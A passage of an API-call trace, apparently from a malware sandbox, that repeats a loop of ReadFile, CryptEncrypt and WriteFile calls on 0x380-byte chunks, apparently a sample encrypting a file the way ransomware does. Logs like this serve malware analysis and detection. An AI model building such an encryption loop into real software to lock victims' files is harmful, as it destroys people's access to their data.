lpBuffer=0x2f2a740*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.465] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.465] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.468] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.468] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.468] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.468] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.468] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.469] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.469] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.469] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.469] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.469] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.469] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.470] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.470] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.470] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.470] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.470] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.471] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.471] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.471] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.471] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.471] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.472] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.472] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.472] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.472] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.472] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.472] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.473] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.473] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.473] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.473] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.473] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.474] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.474] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.474] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.474] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.474] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.475] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.475] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.475] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.475] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.476] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.476] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.476] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.476] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.476] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.476] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] ReadFile 